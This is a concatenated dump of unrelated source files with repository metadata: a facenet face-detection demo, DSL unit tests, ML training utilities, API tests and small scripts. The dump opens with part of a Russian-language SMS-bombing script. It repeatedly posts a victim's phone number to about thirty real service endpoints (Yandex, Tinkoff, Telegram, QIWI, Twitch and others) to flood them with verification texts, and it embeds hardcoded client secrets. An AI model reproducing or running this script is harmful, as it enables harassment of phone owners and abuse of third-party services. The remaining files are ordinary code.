exit()
if t == 1 or gg == 1:
k = input(colored('Введите количество кругов —>', 'magenta'))
t=2
else:
input(colored('Неверно !!!', 'magenta'))
gg = 1
if t == 2:
f = 0
os.system("clear")
if x == 1:
print(colored(banner, 'magenta'))
if x == 2:
print(colored(banner, 'yellow'))
if x == 3:
print(colored(banner, 'green'))
print('')
try:
if int(k) >= 1:
print(colored('Спам запущен!', 'green'))
while int(k) > f:
f += 1
try:
a = requests.post("https://www.citilink.ru/registration/confirm/phone/+" + phone + "/", headers=headers)
print(colored('citilink-[+]', 'green'))
except:
print(colored('citilink-[-]', 'green'))
try:
a = requests.post("https://u.icq.net/api/v32/rapi/auth/sendCode",
json={"reqId": "91101-1606335718",
"params": {"phone": phone, "language": "ru-RU", "route": "sms",
"devId": "ic1rtwz1s1Hj1O0r", "application": "icq"}}, headers=headers)
print(colored('icq-[+]', 'yellow'))
except:
print(colored('icq-[-]', 'yellow'))
try:
a = requests.post("https://www.dns-shop.ru/auth/auth/fast-authorization/", data={"FastAuthorizationLoginLoadForm[login]" : phone}, headers=headers)
print(colored('dns-shop.ru-[+]', 'magenta'))
except:
print(colored('dns-shop.ru-[-]', 'magenta'))
try:
a = requests.post("https://lenta.com/api/v1/registration/requestValidationCode", json={"phone" : "+" + phone}, headers=headers)
print(colored('lenta.com-[+]', 'blue'))
except:
print(colored('lenta.com-[-]', 'blue'))
try:
a = requests.post("https://taxi.yandex.ru/3.0/auth",
json={"id": "fa137685fd594a9f86f529eec9543e96", "phone": phone}, headers=headers)
print(colored('taxi.yandex-[+]', 'cyan'))
except:
print(colored('taxi.yandex-[-]', 'cyan'))
try:
a = requests.post("https://youla.ru/web-api/auth/request_code",
json={"phone": phone}, headers=headers)
print(colored('youla-[+]', 'magenta'))
except:
print(colored('youla-[-]', 'magenta'))
try:
a = requests.post("https://www.icq.com/smsreg/requestPhoneValidation.php", data={
"msisdn": phone,
"locale": "en",
"countryCode": "ru",
"version": "1",
"k": "ic1rtwz1s1Hj1O0r",
"r": "46763"
}, headers=headers)
print(colored('icq.com-[+]', 'cyan'))
except:
print(colored('icq.com-[-]', 'cyan'))
try:
a = requests.post("https://eda.yandex.ru/api/v1/user/request_authentication_code",
json={"phone_number": phone}, headers=headers)
print(colored('eda.yandex-[+]', 'yellow'))
except:
print(colored('eda.yandex-[-]', 'yellow'))
try:
a = requests.post("https://shop.vsk.ru/ajax/auth/postSms/",
data={"phone": phone}, headers=headers)
print(colored('shop.vsk-[+]', 'green'))
except:
print(colored('shop.vsk-[-]', 'green'))
try:
a = requests.post("https://ok.ru/dk?cmd=AnonymRecoveryStartPhoneLink&st.cmd=anonymRecoveryStartPhoneLink",
data={"st.r.phone": "+" + phone}, headers=headers)
print(colored('ok.ru-[+]', 'blue'))
except:
print(colored('ok.ru-[-]', 'blue'))
try:
a = requests.post("https://nn-card.ru/api/1.0/register",
json={"phone": phone, "password": 'DDd7873456'}, headers=headers)
print(colored('nn-card-[+]', 'cyan'))
except:
print(colored('nn-card-[-]', 'cyan'))
try:
a = requests.post("https://my.modulbank.ru/api/v2/auth/phone",
json={"CellPhone": phone[1:]}, headers=headers)
print(colored('my.modulbank-[+]', 'cyan'))
except:
print(colored('my.modulbank-[-]', 'cyan'))
try:
a = requests.post(
"https://www.tinkoff.ru/api/common/v1/sign_up?origin=web%2Cib5%2Cplatform&sessionid=uRdqKtttiyJYz6ShCqO076kNyTraz7pa.m1-prod-api56&wuid=8604f6d4327bf4ef2fc2b3efb36c8e35",
data={"phone": "+" + phone}, headers=headers)
print(colored('tinkoff-[+]', 'yellow'))
except:
print(colored('tinkoff-[-]', 'yellow'))
try:
a = requests.post("https://sayan.rutaxi.ru/ajax_keycode.html?qip=962358614986707810&lang=ru&source=0",
data={"l": phone[1:]}, headers=headers)
print(colored('rutaxi-[+]', 'green'))
except:
print(colored('rutaxi-[-]', 'green'))
try:
a = requests.post("https://my.modulbank.ru/api/v2/auth/phone",
data={"CellPhone": phone[1:]}, headers=headers)
print(colored('modulbank-[+]', 'magenta'))
except:
print(colored('modulbank-[-]', 'magenta'))
try:
a = requests.post("https://ng-api.webbankir.com/user/v2/create",
json={"lastName": "уцвцу", "firstName": "цувцу", "middleName": "цуацуа",
"mobilePhone": phone, "email": "[email protected]", "smsCode": ""}, headers=headers)
print(colored('webbankir-[+]', 'magenta'))
except:
print(colored('webbankir-[-]', 'magenta'))
try:
a = requests.post("https://stavropol.sushi-market.com/sendForm/callMeBack",
json={"phone": phone[1:], "name": "Егор"}, headers=headers)
print(colored('stavropol-[+]', 'yellow'))
except:
print(colored('stavropol-[-]', 'yellow'))
try:
a = requests.post("https://m.tiktok.com/node-a/send/download_link", json={"slideVerify":0,"language":"ru","PhoneRegionCode":"7","Mobile":phone[1:],"page":{"pageName":"home","launchMode":"direct","trafficType":""}}, headers=headers)
print(colored('tiktok-[+]', 'yellow'))
except:
print(colored('tiktok-[-]', 'yellow'))
try:
a = requests.post("https://api.sunlight.net/v3/customers/authorization/", data={"phone": phone}, headers=headers)
print(colored('sunlight-[+]', 'cyan'))
except:
print(colored('sunlight-[-]', 'cyan'))
try:
a = requests.post("https://cloud.mail.ru/api/v2/notify/applink",
json={
"phone": "+" + phone,
"api": 2,
"email": '[email protected]',
"x-email": "x-email",
}, headers=headers)
print(colored('mail.ru-[+]', 'blue'))
except:
print(colored('mail.ru-[-]', 'blue'))
try:
a = requests.post("https://mobile-api.qiwi.com/oauth/authorize",
data={
"response_type": "urn:qiwi:oauth:response-type:confirmation-id",
"username": phone,
"client_id": "android-qw",
"client_secret": "zAm4FKq9UnSe7id",
}, headers=headers)
print(colored('qiwi-[+]', 'magenta'))
except:
print(colored('qiwi-[-]', 'magenta'))
try:
a = requests.post("https://lenta.com/api/v1/authentication/requestValidationCode",
json={"phone": "+" + phone}, headers=headers)
print(colored('tiktok-[+]', 'yellow'))
except:
print(colored('tiktok-[-]', 'yellow'))
try:
a = requests.post("https://passport.twitch.tv/register?trusted_request=true",
json={
"birthday": {"day": 12, "month": 10, "year": 2000},
"client_id": "kd1unb4b3q4t58fwlpcbzcbnm76a8fp",
"include_verification_code": True,
"password": 'Danil5564554',
"phone_number": phone,
"username": 'bhtrtrrrtbhtrbhtr',
}, headers=headers)
print(colored('twitch.tv-[+]', 'yellow'))
except:
print(colored('twitch.tv-[-]', 'yellow'))
try:
a = requests.post("https://my.telegram.org/auth/send_password",
data={"phone": "+" + phone}, headers=headers)
print(colored('telegram-[+]', 'magenta'))
except:
print(colored('telegram-[-]', 'magenta'))
try:
a = requests.post('https://prod.tvh.mts.ru/tvh-public-api-gateway/public/rest/general/send-code',
params={'msisdn': phone}, headers=headers)
print(colored('mts.ru-[+]', 'cyan'))
except:
print(colored('mts.ru-[-]', 'cyan'))
try:
a = requests.post('https://www.etm.ru/cat/runprog.html',
data={'m_phone': phone, 'mode': 'sendSms', 'syf_prog': 'clients-services', 'getSysParam': 'yes'}, headers=headers)
print(colored('etm.ru-[+]', 'green'))
except:
print(colored('etm.ru-[-]', 'green'))
print(colored(f'{f}' + ' - круг закончин!', 'green'))
print(colored('Спам прекращён!', 'magenta'))
time.sleep(3)
os.system("python3 dibom.py")
exit()
else:
os.system("python3 dibom.py")
exit()
except:
os.system("python3 dibom.py")
exit()
input()
| [
"[email protected]"
] | |
a132d6e2bec0e88d70cafe8181942a94ddfd3b75 | 4f9c36da69695ec3acd440f5cc173a4946606453 | /src/detect_face_demo.py | 69932f5b8d433eeb059ea2e288d72e104a519fdb | [
"MIT"
] | permissive | yuhaoluo/facenet | a219841cd9174a8d329c4387a85c0ff2505ccccc | d3a3087f52ae1a17a77a1dadb81c53911be97b4b | refs/heads/master | 2020-04-06T09:19:57.746972 | 2018-11-13T07:32:41 | 2018-11-13T07:32:41 | 157,337,932 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,861 | py | # MIT License
#
# Copyright (c) 2016 David Sandberg
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from scipy import misc
import sys
import os
import argparse
import tensorflow as tf
import numpy as np
import facenet
import align.detect_face
import random
from time import sleep
import time
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
def main(args):
sleep(random.random())
output_dir = os.path.expanduser(args.output_dir)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
# Store some git revision info in a text file in the log directory
src_path,_ = os.path.split(os.path.realpath(__file__))
facenet.store_revision_info(src_path, output_dir, ' '.join(sys.argv))
dataset = facenet.get_dataset(args.input_dir)
print('Creating networks and loading parameters')
with tf.Graph().as_default():
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=args.gpu_memory_fraction)
sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, log_device_placement=False))
with sess.as_default():
start_time = time.time();
pnet, rnet, onet = align.detect_face.create_mtcnn(sess, None)
print('load mtcnn model time: ', (time.time() - start_time))
minsize = 20 # minimum size of face
threshold = [ 0.6, 0.7, 0.7 ] # three steps's threshold
factor = 0.709 # scale factor
# Add a random key to the filename to allow alignment using multiple processes
random_key = np.random.randint(0, high=99999)
bounding_boxes_filename = os.path.join(output_dir, 'bounding_boxes_%05d.txt' % random_key)
with open(bounding_boxes_filename, "w") as text_file:
nrof_images_total = 0
nrof_successfully_aligned = 0
if args.random_order:
random.shuffle(dataset)
for cls in dataset:
output_class_dir = os.path.join(output_dir, cls.name)
if not os.path.exists(output_class_dir):
os.makedirs(output_class_dir)
if args.random_order:
random.shuffle(cls.image_paths)
for image_path in cls.image_paths:
nrof_images_total += 1
filename = os.path.splitext(os.path.split(image_path)[1])[0]
output_filename = os.path.join(output_class_dir, filename+'.png')
print(image_path)
if not os.path.exists(output_filename):
try:
img = misc.imread(image_path)
except (IOError, ValueError, IndexError) as e:
errorMessage = '{}: {}'.format(image_path, e)
print(errorMessage)
else:
if img.ndim<2:
print('Unable to align "%s"' % image_path)
text_file.write('%s\n' % (output_filename))
continue
if img.ndim == 2:
img = facenet.to_rgb(img)
img = img[:,:,0:3]
detect_time_start = time.time()
bounding_boxes, _ = align.detect_face.detect_face(img, minsize, pnet, rnet, onet, threshold, factor)
detect_time = time.time() - detect_time_start
print('detect_face_time: ', detect_time)
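                        # bounding_boxes (sketch of the usual facenet MTCNN output, an
                        # assumption about this detect_face version): an (N, 5) array with
                        # one row per detected face: [x1, y1, x2, y2, confidence].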
# =============================================================================
# nrof_faces = bounding_boxes.shape[0]
# if nrof_faces>0:
# det = bounding_boxes[:,0:4]
# det_arr = []
# img_size = np.asarray(img.shape)[0:2]
# if nrof_faces>1:
# if args.detect_multiple_faces:
# for i in range(nrof_faces):
# det_arr.append(np.squeeze(det[i]))
# else:
# bounding_box_size = (det[:,2]-det[:,0])*(det[:,3]-det[:,1])
# img_center = img_size / 2
# offsets = np.vstack([ (det[:,0]+det[:,2])/2-img_center[1], (det[:,1]+det[:,3])/2-img_center[0] ])
# offset_dist_squared = np.sum(np.power(offsets,2.0),0)
# index = np.argmax(bounding_box_size-offset_dist_squared*2.0) # some extra weight on the centering
# det_arr.append(det[index,:])
# else:
# det_arr.append(np.squeeze(det))
#
# for i, det in enumerate(det_arr):
# det = np.squeeze(det)
# bb = np.zeros(4, dtype=np.int32)
# bb[0] = np.maximum(det[0]-args.margin/2, 0)
# bb[1] = np.maximum(det[1]-args.margin/2, 0)
# bb[2] = np.minimum(det[2]+args.margin/2, img_size[1])
# bb[3] = np.minimum(det[3]+args.margin/2, img_size[0])
# cropped = img[bb[1]:bb[3],bb[0]:bb[2],:]
# scaled = misc.imresize(cropped, (args.image_size, args.image_size), interp='bilinear')
# nrof_successfully_aligned += 1
# filename_base, file_extension = os.path.splitext(output_filename)
# if args.detect_multiple_faces:
# output_filename_n = "{}_{}{}".format(filename_base, i, file_extension)
# else:
# output_filename_n = "{}{}".format(filename_base, file_extension)
# misc.imsave(output_filename_n, scaled)
# text_file.write('%s %d %d %d %d\n' % (output_filename_n, bb[0], bb[1], bb[2], bb[3]))
# else:
# print('Unable to align "%s"' % image_path)
# text_file.write('%s\n' % (output_filename))
#
# print('Total number of images: %d' % nrof_images_total)
# print('Number of successfully aligned images: %d' % nrof_successfully_aligned)
# =============================================================================
def parse_arguments(argv):
parser = argparse.ArgumentParser()
parser.add_argument('input_dir', type=str, help='Directory with unaligned images.')
parser.add_argument('output_dir', type=str, help='Directory with aligned face thumbnails.')
parser.add_argument('--image_size', type=int,
help='Image size (height, width) in pixels.', default=182)
parser.add_argument('--margin', type=int,
help='Margin for the crop around the bounding box (height, width) in pixels.', default=44)
parser.add_argument('--random_order',
help='Shuffles the order of images to enable alignment using multiple processes.', action='store_true')
parser.add_argument('--gpu_memory_fraction', type=float,
help='Upper bound on the amount of GPU memory that will be used by the process.', default=1.0)
parser.add_argument('--detect_multiple_faces', type=bool,
help='Detect and align multiple faces per image.', default=True)
return parser.parse_args(argv)
if __name__ == '__main__':
main(parse_arguments(sys.argv[1:]))
| [
"[email protected]"
] | |
e0aa7247ec9ab1a7dd3b83e32c5e207cff94e4b0 | 74565d83bccccfae0d57d0e947f12db2bcae2999 | /phi/tests/test_dsl.py | 7de169da513bd1d88114d2556a8ba230e9e7485a | [
"MIT"
] | permissive | iCodeIN/phi | 2fe9eaaf21615381e1b1815853adeb76a79fb696 | 87fd7100a76f823232f4fd8360498b4b80675265 | refs/heads/master | 2023-03-21T07:50:28.218564 | 2018-08-13T14:14:07 | 2018-08-13T14:14:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,615 | py | from phi.api import *
from phi import dsl
import pytest
class TestDSL(object):
"""docstring for TestDSL."""
def test_compile(self):
f = Seq(P + 1, P * 2)
assert f(2) == 6
def test_read(self):
refs = dict(
x = 10
)
f = Read('x')
y, new_refs = f(None, True, **refs)
assert refs == new_refs #read doesnt modify
assert y == 10
def test_write(self):
r = dsl.Ref('r')
f = Seq(
Write(a = P + 1),
Write(b = P * 2),
Write(c = P * 100),
List(Read.c, Read.a, Read.b)
)
assert [600, 3, 6] == f(2)
r = Ref('r')
f = Seq(
Write(a = P + 1),
Write(b = P * 2),
Write(c = P * 100), r.write,
List(Read.c, Read.a, Read.b)
)
assert [600, 3, 6] == f(2)
assert r() == 600
def test_write_tree(self):
f = Seq(
P + 1,
P * 2,
List(
Write(c = P * 100)
,
P - 3
,
Read.c
)
)
assert [600, 3, 600] == f(2)
    def test_write_tree_with_write_node(self):  # renamed: a second test_write_tree would shadow the first definition above
f = Seq(
P + 1,
P * 2,
List(
P * 100
,
Write(c = P)
,
P - 3
,
Read('c')
)
)
assert [600, 6, 3, 6] == f(2)
def test_input(self):
f = Seq(
Write(a = P),
P + 1,
List(
Seq(
10,
P * 2
)
,
Read('a')
,
P
)
)
assert [20, 2, 3] == f(2)
def test_identities(self):
f = List(
Seq(),
List()
)
assert [4, []] == f(4)
def test_single_functions(self):
f = List(
P * 2,
List(P + 1)
)
assert [2, [2]] == f(1)
def test_class(self):
f = Seq(
str,
P + '0',
int
)
assert 20 == f(2)
ast = dsl._parse(str)
assert type(ast) is dsl.Expression
def test_list(self):
f = Seq(
List(
P + 1
,
P * 2
),
List(
Seq(
lambda l: map(str, l),
list
)
,
P
)
)
assert [['4', '6'], [4, 6]] == f(3)
def test_dict(self):
f = Seq(
Dict(
original = P,
upper = Obj.upper(),
len = len
),
List(
P
,
Seq(
Rec.len,
P * 2
)
)
)
[obj, double_len] = f("hello")
assert obj.original == "hello"
assert obj.upper == "HELLO"
assert obj.len == 5
assert double_len == 10
def test_fn(self):
assert "hola" == P.Pipe(
"HOLA",
Obj.lower()
)
def test_record_object(self):
x = P.Pipe(
[1,2,3],
Dict(
sum = sum
,
len = len
)
)
assert x.sum == 6
assert x.len == 3
assert x['sum'] == 6
assert x['len'] == 3
def test_compile_refs(self):
x = P.Pipe(
[1,2,3],
Dict(
sum = sum
,
len = len
,
x = Read.x
,
z = Read('y') + 2
),
refs = dict(
x = 10,
y = 5
)
)
assert x.sum == 6
assert x.len == 3
assert x.x == 10
assert x.z == 7
assert x['sum'] == 6
assert x['len'] == 3
assert x['x'] == 10
assert x['z'] == 7
#############################
f = P.Seq(
If( P > 2,
Write(s = P)
),
Read('s')
)
assert f(3) == 3
with pytest.raises(Exception):
f(1)
def test_nested_compiles(self):
assert 2 == P.Pipe(
1, Write(s = P),
Seq(
Write(s = P + 1)
),
Write(s = P)
)
def test_if(self):
f = P.Seq(
If( P > 0,
P
).Else(
0
)
)
assert f(5) == 5
assert f(-3) == 0
def test_right_hand(self):
f = Seq(
P + 1,
[ P, 2, 3 ]
)
assert f(0) == [ 1, 2, 3 ]
f = Seq(
P + 1,
( P, 2, 3 )
)
assert f(0) == ( 1, 2, 3 )
f = Seq(
P + 1,
{ P, 2, 3 }
)
assert f(0) == { 1, 2, 3 }
f = Seq(
P + 1,
{"a": P, "b": 2, "c": 3 }
)
assert f(0) == {"a": 1, "b": 2, "c": 3 }
def test_readlist(self):
assert [2, 4, 22] == Pipe(
1,
Write(a = P + 1), #a = 1 + 1 == 2
Write(b = P * 2), #b = 2 * 2 == 4
P * 5, # 4 * 5 == 20
P + 2, # 20 + 2 == 22
ReadList('a', 'b', P) # [a, b, 22] == [2, 4, 22]
)
| [
"[email protected]"
] | |
9959840f6b1866b0284ec39f9c306c96ab928a7a | 3309fd8a4fcd8bc5a267de55d9c493a4cd875566 | /greet.py | d055c3f557175cd941ba1e5c5d60ff61fabd5bee | [] | no_license | asconem/PythonFundamentals.Exercises.Part2 | e8f0f933afd901ab354a95f6651c98f5ebc94e18 | e1e6cfd4d27cdc27f1cdf7e949f70e9922905a20 | refs/heads/master | 2022-10-09T23:54:27.960572 | 2020-06-03T02:45:37 | 2020-06-03T02:45:37 | 260,521,446 | 0 | 0 | null | 2020-05-01T17:45:14 | 2020-05-01T17:45:13 | null | UTF-8 | Python | false | false | 377 | py | def name_input():
"""
This function requests a user to enter their name via an input prompt
"""
user_name = input("Please enter your name: ")
return user_name
def greet(name):
"""
This function takes in a person's name as a parameter and returns a customized greeting
"""
print("Hello " + name + "! How are you today?")
greet(name_input()) | [
"[email protected]"
] | |
94dd16cf8586b81bf968e7826152716ef2c63d58 | da8cf50a82a3e18f0b72409ee260de44f9081264 | /training.py | 940267a6abebb3ba3c6b11695b9cf69150359980 | [] | no_license | jamied157/thesispublic | 1d838a6a98b0a6e4dd3bd601bb4b008d29bc2f46 | 319fd6ba1e95267b85f37ca06d8b716264e80f1a | refs/heads/master | 2020-07-18T17:07:26.659284 | 2019-09-04T09:31:56 | 2019-09-04T09:31:56 | 206,281,250 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,014 | py | import numpy as np
import torch
from torch import Tensor
from torch.utils import data
from sklearn.model_selection import ParameterGrid
import logging
class UncertaintyDataset(data.Dataset):
"""
Characterises a dataset for PyTorch
"""
def __init__(self, X, Y):
self.X, self.Y = Tensor(X), Tensor(Y)
self.y_normalised = False
self.x_normalised = False
self.y_std = self.Y.std()
self.y_mean = self.Y.mean()
self.x_std = self.X.std(dim=0)
self.x_mean = self.X.mean(dim=0)
def __len__(self):
"""Denotes the total number of samples"""
return self.X.shape[0]
def n_features(self):
return self.X.shape[1]
def normalise_y(self):
"""Normalise outputs and save parameters to instance"""
if not self.y_normalised:
self.Y = (self.Y - self.y_mean) / self.y_std
self.y_normalised = True
else:
pass
return self.y_mean, self.y_std
def normalise_x(self):
"""Normalise outputs and save parameters to instance"""
if not self.x_normalised:
# Check for 0 standard deviation variables
constant_x = self.x_std == 0
self.X = (self.X - self.x_mean)/self.x_std
self.X[:, constant_x] = 0
self.x_normalised = True
else:
pass
return self.x_mean, self.x_std
def __getitem__(self, index):
"""Generates one sample of data"""
return self.X[index, :], self.Y[index]
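# Minimal usage sketch (synthetic data; the names here are illustrative only):
# X, Y = np.random.randn(100, 4), np.random.randn(100)
# ds = UncertaintyDataset(X, Y)
# ds.normalise_x(); ds.normalise_y()
# x0, y0 = ds[0]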
def ensemble_loss(y: Tensor, y_hat_arr: Tensor, tau: float):
"""Loss for MC Dropout Net"""
t = y_hat_arr.shape[0]
ll = (torch.logsumexp(-0.5 * tau * (y - y_hat_arr.squeeze()) ** 2, 0) - np.log(t)
- 0.5 * np.log(2 * np.pi) + 0.5 * np.log(tau))
return -ll.mean()
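# ensemble_loss is the MC-dropout predictive NLL: for T stochastic forward passes it
# computes -log( (1/T) * sum_t sqrt(tau/(2*pi)) * exp(-tau/2 * (y - y_hat_t)^2) ),
# done stably via logsumexp. Call sketch (shapes assumed from the code:
# y is (B,), y_hat_arr is (T, B, 1)):
# nll = ensemble_loss(torch.randn(32), torch.randn(10, 32, 1), tau=1.0)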
def normal_nll(targets: torch.Tensor, predictions: torch.Tensor, var: torch.Tensor):
"""
Outputs the mean log likelihood of a normal rv for all targets
:param targets: output variables
:param predictions: predictions made for targets
:param var: array of predicted variances for each target
:return mean log likelihood for a normal rv:
"""
targets = targets.squeeze()
predictions = predictions.squeeze()
var = var.squeeze()
reg_term = 0.5 * torch.log(2 * np.pi * var)
err_term = 0.5 * (var ** (-1)) * (targets - predictions) ** 2
return torch.mean(reg_term + err_term)
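# normal_nll is the per-point Gaussian negative log-likelihood, averaged over the
# batch: -log N(y; mu, var) = 0.5*log(2*pi*var) + (y - mu)^2 / (2*var).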
def cross_validate(train_data, ModelClass, param_grid):
"""Cross validation routine - splits once and loops over possible parameters, reports parameters with least error"""
param_grid = ParameterGrid(param_grid)
num_training_examples = int(0.8 * len(train_data))
X_train, y_train = train_data[:num_training_examples]
new_train_data = UncertaintyDataset(X_train, y_train)
X_valid, y_valid = train_data[num_training_examples:]
valid_data = UncertaintyDataset(X_valid, y_valid)
best_nll = float('inf')
best_param_dict = {}
for param_dict in param_grid:
# print('Trying ' + str(param_dict))
logging.info('INFO DICT: ' + str(param_dict))
model = ModelClass(X_train.shape[1], param_dict)
model.fit(new_train_data)
model_nll, _, _ = model.test_loss(valid_data)
# print('nll: {:.3f}'.format(model_nll))
if model_nll < best_nll:
best_nll = model_nll
best_param_dict = param_dict
return best_param_dict
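# Usage sketch (grid keys depend on the ModelClass; these names are illustrative):
# best = cross_validate(train_data, SomeModel, {'lr': [1e-3, 1e-2], 'n_hidden': [50, 100]})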
def standard_training_setup(train_data: UncertaintyDataset, test_data: UncertaintyDataset, ModelClass, param_grid):
"""Standard setup for uncertainty eexperiments"""
best_param_dict = cross_validate(train_data, ModelClass, param_grid)
print('Parameters: ' + str(best_param_dict))
model_1 = ModelClass(train_data.n_features(), best_param_dict)
model_1.fit(train_data)
test_nll, test_rmse, calibration_arr = model_1.test_loss(test_data)
return test_nll, test_rmse, calibration_arr, best_param_dict
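# End-to-end sketch (SomeModel and the grid are illustrative):
# nll, rmse, calibration, params = standard_training_setup(train_data, test_data,
#                                                          SomeModel, {'lr': [1e-3, 1e-2]})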
| [
"[email protected]"
] | |
c7c8c9f682ca024b8700ca441791a0178cd6a7c8 | 224ca57f7f0ceeaf93b2ae93bcaedee5e1e8589d | /leetcode/closure.py | 67cd61558f7eb0edb72da9f4ba6da07ace8b5774 | [] | no_license | myliu/python-algorithm | 71fa69502596634464007f64d3ac02826d3b07df | 036a29d681cc91f2317d454e04530d7375d55478 | refs/heads/master | 2021-01-23T11:34:07.732641 | 2017-02-27T00:27:58 | 2017-02-27T00:27:58 | 13,375,481 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | # http://www.shutupandship.com/2012/01/python-closures-explained.html
def generate_power_func(n):
print "id(n): %X" % id(n)
def nth_power(x):
return x**n
print "id(nth_power): %X" % id(nth_power)
return nth_power
if __name__ == '__main__':
raise_to_2 = generate_power_func(2)
print raise_to_2.__closure__[0].cell_contents
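    # Expected behaviour (sketch): the closure cell captures n == 2, so
    # cell_contents prints 2 above, and raise_to_2(5) below prints 25.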
print raise_to_2(5) | [
"[email protected]"
] | |
876bc78f7d3c3f6a9d70df6c7f854fd2c0dc8eb8 | fd27119866acf233768d006af100f1fd8027fd14 | /tests_inprogress/test_heartbeats.py | 3609a6c591eea7e9d8dabafcf31ecc9812c36093 | [] | no_license | afrocubanito/cm-python-autoapi | dbdf06c765d46ee932fbd6e35add80d3cb6f8d15 | 2a0e4335842e08220b1745a459ecc7f627bc8087 | refs/heads/master | 2020-04-25T12:51:28.900309 | 2018-09-19T18:03:15 | 2018-09-19T18:03:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,985 | py | __author__ = 'rkaye'
from nose import with_setup
from nose.tools import nottest
import logging
import logging.config
import configparser
from framework.constants import CONFIG_FILE_PATH, LOG_FILE_PATH
from framework.authentication_rest import login, logout, get_auth_token
from framework.http_rest import *
from framework.player_rest import Player
from framework.heartbeats_rest import Heartbeats, Heartbeat_event
import inspect
print(CONFIG_FILE_PATH)
config = configparser.ConfigParser()
config.read(CONFIG_FILE_PATH)
baseurl = config['login']['baseurl']
logging.config.fileConfig(LOG_FILE_PATH)
logging.debug('Logging config file path is: {}'.format(CONFIG_FILE_PATH))
session = requests.Session()
namespace = config['test']['namespace']
api_version = config['api_info']['api_version']
player_id = 0
def this_function_name():
return inspect.stack()[1][3]
def t_setup():
'''
In order to test this case, a new user must be created and the session must be logged in as this new user.
That user must create a media and then approve it.
'''
# Begin by initiating a new login session for this test case.
global config, session, media_id_list, baseurl, namespace, player_id, api_version
logging.info('Beginning test setup')
baseurl = config['login']['baseurl']
username = config['login']['username']
password = config['login']['password']
logging.debug('Read login info from config file and ready to begin.')
logging.info('Initializing session for next test case.')
media_path = config['path']['media']
# INITIALIZE SESSION OBJECT
session = login(username, password, baseurl)
assert session is not None
# Create a player to run these tests against
player = Player(api_version=api_version)
player_name = namespace + "_" + this_function_name() + "_" + "player"
player_create_result = player.create_player(session=session, baseurl=baseurl, name=player_name)
    logging.info('Result from create player call in test case setup is: {}'.format(player_create_result))
player_id = player.get_id()
def t_teardown():
global session, player_id, api_version
# Delete Player created for this test case
player = Player(api_version)
#player.delete_player_by_id(session,baseurl, id = player_id)
response = logout(session, config['login']['baseurl'])
assert response
@with_setup(t_setup, t_teardown)
def test_initial_get_heartbeat_sequence():
'''
Use GET /api/rest/players/{id} to pull in the player data for this test case
pull out the UUID of the player returned by the GET
Use GET /api/rest/heartbeats/sequence/{uuid} - validate that it starts at 0
:return:
'''
global session, namespace, baseurl, api_version, player_id
logging.info('Beginning {}'.format(this_function_name()))
# Get the Player data and parse the UUID
player = Player(api_version)
player_get_result = player.find_player_by_id(session, baseurl=baseurl, id=player_id)
logging.debug('Current Player in use for this test case is: {}'.format(player.last_response.text))
uuid = player.get_response_key('uuid')
# Get the sequence number of the heartbeats
heartbeat_controller = Heartbeats(api_version)
assert heartbeat_controller.get_current_heartbeat_sequence_of_player(session, baseurl=baseurl, uuid=uuid), 'Failed to retrieve sequence number.'
sequence = heartbeat_controller.get_json_data()
logging.info('Current sequence number is: {}'.format(sequence))
assert sequence == 0, 'Sequence number not 0. Sequence number is {}'.format(sequence)
@with_setup(t_setup, t_teardown)
def test_report_heartbeat():
'''
Use POST /api/rest/heartbeats to add a heartbeat message to the player created in the setup
Use GET /api/rest/players to pull the player down and examine the heartbeat - make sure it is present.
:return:
'''
global session, baseurl, player_id, api_version, namespace
logging.info ('Beginning {}'.format(this_function_name()))
# Get UUID of player under test
player = Player(api_version)
player.find_player_by_id(session,baseurl = baseurl, player_id =player_id)
logging.debug('Current Player in use for this test case is: {}'.format(player.last_response.text))
uuid = player.get_response_key('uuid')
# Create a Heartbeat event
heartbeat_problem_message = 'Test Heartbeat message for ns ' + namespace
heartbeat = Heartbeat_event(api_version = api_version, problemMessage = heartbeat_problem_message)
# Send the heartbeat message to the player under test
heartbeat_controller = Heartbeats(api_version)
assert heartbeat_controller.report_heartbeat(session, baseurl = baseurl, uuid = uuid, events = [heartbeat.get_json_data()] ), 'Incorrect response code from report heartbeat message.'
#Verify that the heartbeat message got added to the player under test
@with_setup(t_setup, t_teardown)
def test_increment_get_heartbeat_sequence():
pass
| [
"[email protected]"
] | |
f0a307f6a7c95294fb2c74511822129b3d6ba922 | 682ef96201c2cb8591b70bc7bed16ccd6e66a56c | /ecommerce/views.py | 1fe5cf5c002fb3b9ff178a27f0c8dc99448f5f5a | [] | no_license | leducthanh/Ecommerce | 8ea6246f866e97fbb434d23359b495863b06ff5d | 50460ace23cb865f1d14c11d5d88afe440092aae | refs/heads/master | 2023-01-11T05:25:21.533948 | 2020-11-14T14:49:10 | 2020-11-14T14:49:10 | 286,441,438 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | py | from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, get_user_model, login, logout
# Create your views here.
def home_page(request):
context= {
}
return render(request,'home_page.html',context)
| [
"[email protected]"
] | |
